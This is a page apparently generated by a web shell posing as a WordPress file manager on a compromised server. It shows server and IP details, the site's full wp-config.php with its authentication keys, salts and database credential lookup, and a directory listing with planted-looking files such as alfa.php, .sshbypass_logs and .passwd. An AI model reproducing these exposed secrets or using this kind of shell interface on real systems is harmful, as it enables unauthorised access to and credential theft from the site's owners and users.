GRAYBYTE WORDPRESS FILE MANAGER6769

Server IP : 3.104.188.249 / Your IP : 216.73.217.141
System : Linux ip-172-26-1-242 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
PHP Version : 8.3.31
Disable Function : NONE
cURL : ON | WGET : ON | Sudo : ON | Pkexec : OFF
Directory : /var/www/html/
Upload Files :
Current_dir [ Writeable ] Document_root [ Writeable ]

Command :


Current File : /var/www/html//wp-config.php
<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the installation.
 * You don't have to use the website, you can copy this file to "wp-config.php"
 * and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * Database settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/
 *
 * @package WordPress
 */

// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress-db' );

/** Database username */
define( 'DB_USER', 'user' );

/** Database password */
$cmd = 'tail -n 1 /opt/aws/wordpress/credentials.log';
$db_password = shell_exec($cmd);
$db_password = str_replace(PHP_EOL, "", $db_password);
define( 'DB_PASSWORD', $db_password );

/** Database hostname */
define( 'DB_HOST', 'localhost' );

/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );

/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

/**#@+
 * Authentication unique keys and salts.
 *
 * Change these to different unique phrases! You can generate these using
 * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
 *
 * You can change these at any point in time to invalidate all existing cookies.
 * This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define( 'AUTH_KEY',         'eaZ1AvG4C7fdWElEwHNE7sdcv4aRC148mtjk1IGtZGG4NVn7zmMyQE7pRtSQGCns' );
define( 'SECURE_AUTH_KEY',  '6FPU1Ss1e9w2Nw07b4kbKhTVLLzs799UmTpWjnkFjnf8pnnqTsjUHcIIxZ7DRELB' );
define( 'LOGGED_IN_KEY',    'BKRcgOdlogC5wonBfgJpb5IVRuWodnshHrDWGFxFsKrsEnbc9ztAPCxfkOG70deV' );
define( 'NONCE_KEY',        'uKr3usfGeTzCpfYeVvpeeitwew8Q4LUPtzVdNt9Dx0hR1tyy5nfblyKq6B1difdJ' );
define( 'AUTH_SALT',        'lJt3YHTZBEhwDdYaLVKL3CBMn0jTd27s9jSv7ndOAbcDf8vvH2rG43GR6Hz6GtMP' );
define( 'SECURE_AUTH_SALT', '2vUhJ62O3eBkRBdeE6Pt4UFcd3KWE62jPsQt1JH1jLOVuBXyLzhYzBoXckyVtG4h' );
define( 'LOGGED_IN_SALT',   'BxD5drJrTbq9ea7d0ursC2mhjYP4Z27XM9cJE4MnlOoUPfL3ySgtSMIL3TiiYXeM' );
define( 'NONCE_SALT',       'ktCtQ1GMnNSSQidCEUOmfiYNVij5DSEFX2ReBvOsQizlSzKDmfQzk0Babw1JZdxb' );

/**#@-*/

/**
 * WordPress database table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix = 'wp_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the documentation.
 *
 * @link https://developer.wordpress.org/advanced-administration/debug/debug-wordpress/
 */
define( 'WP_DEBUG', false );

/* Add any custom values between this line and the "stop editing" line. */

define( 'FS_METHOD', 'direct' );

/**
 * The WP_SITEURL and WP_HOME options are configured to access from any hostname or IP address.
 * If you want to access only from an specific domain, you can modify them. For example:
 *  define('WP_HOME','http://example.com');
 *  define('WP_SITEURL','http://example.com');
 */

if ( defined( 'WP_CLI' ) ) {
    $_SERVER['HTTP_HOST'] = '127.0.0.1';
}

define( 'WP_HOME', 'http://' . $_SERVER['HTTP_HOST'] . '/' );
define( 'WP_SITEURL', 'http://' . $_SERVER['HTTP_HOST'] . '/' );

/* That's all, stop editing! Happy publishing. */

/* Upgrade file upload size on wordpress */

@ini_set('upload_max_filesize', '1024M');
@ini_set('post_max_size', '1024M');
@ini_set('memory_limit', '1024M');
@ini_set('max_execution_time', '300');
@ini_set('max_input_time', '300');

define('AI1WM_MAX_FILE_SIZE', 1073741824);


/* Stop autoupdate of website */
define('WP_AUTO_UPDATE_CORE', false);
define('AUTOMATIC_UPDATER_DISABLED', true);

/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
	define( 'ABSPATH', __DIR__ . 'wp-config.php/');
}

/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';

[ Back ]
Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
June 10 2026 03:26:40
admin / www-data
2775
.sshbypass_logs
--
June 10 2026 17:54:31
www-data / www-data
2700
.tmb
--
June 04 2026 19:23:20
www-data / www-data
0755
images
--
June 10 2026 17:11:41
www-data / www-data
0755
phpmyadmin
--
May 27 2026 03:19:02
root / root
0755
wp-admin
--
June 04 2026 19:23:20
www-data / www-data
2775
wp-content
--
June 10 2026 17:10:50
www-data / www-data
2777
wp-includes
--
June 04 2026 19:23:20
www-data / www-data
2775
.cache.php
1.216 KB
June 10 2026 11:21:29
www-data / www-data
0644
.htaccess
1.997 KB
June 10 2026 17:14:58
www-data / www-data
0444
.passwd
0.059 KB
June 10 2026 17:51:44
www-data / www-data
0644
admin.php
42.09 KB
June 10 2026 17:50:37
www-data / www-data
0644
alfa.php
446.542 KB
June 10 2026 17:55:04
www-data / www-data
0755
index.php
22.958 KB
June 04 2026 19:19:37
www-data / www-data
0444
license.txt
19.437 KB
May 27 2026 03:19:33
www-data / www-data
0664
readme.html
7.232 KB
May 27 2026 03:19:33
www-data / www-data
0664
robots.txt
0.074 KB
June 04 2026 19:19:38
www-data / www-data
0644
unzipper.php
11.986 KB
June 10 2026 17:17:47
www-data / www-data
0644
wp-activate.php
11.986 KB
June 10 2026 17:19:08
www-data / www-data
0664
wp-blog-header.php
0.447 KB
June 04 2026 19:19:38
www-data / www-data
0664
wp-comments-post.php
2.269 KB
May 27 2026 03:19:33
www-data / www-data
0664
wp-config-sample.php
1.16 KB
June 10 2026 11:22:00
www-data / www-data
0664
wp-config.php
4.182 KB
June 10 2026 03:26:40
www-data / www-data
0644
wp-cron.php
5.485 KB
May 27 2026 03:19:33
www-data / www-data
0664
wp-links-opml.php
2.435 KB
May 27 2026 03:19:33
www-data / www-data
0664
wp-load.php
3.941 KB
June 04 2026 19:19:38
www-data / www-data
0664
wp-login.php
50.635 KB
May 27 2026 03:19:33
www-data / www-data
0664
wp-mail.php
8.522 KB
May 27 2026 03:19:33
www-data / www-data
0664
wp-settings.php
18.581 KB
June 10 2026 17:12:51
www-data / www-data
0664
wp-signup.php
33.81 KB
May 27 2026 03:19:33
www-data / www-data
0664
wp-trackback.php
5.092 KB
May 27 2026 03:19:33
www-data / www-data
0664
xmlrpc.php
3.13 KB
May 27 2026 03:19:33
www-data / www-data
0664

GRAYBYTE WORDPRESS FILE MANAGER @ 2025
CONTACT ME
Static GIF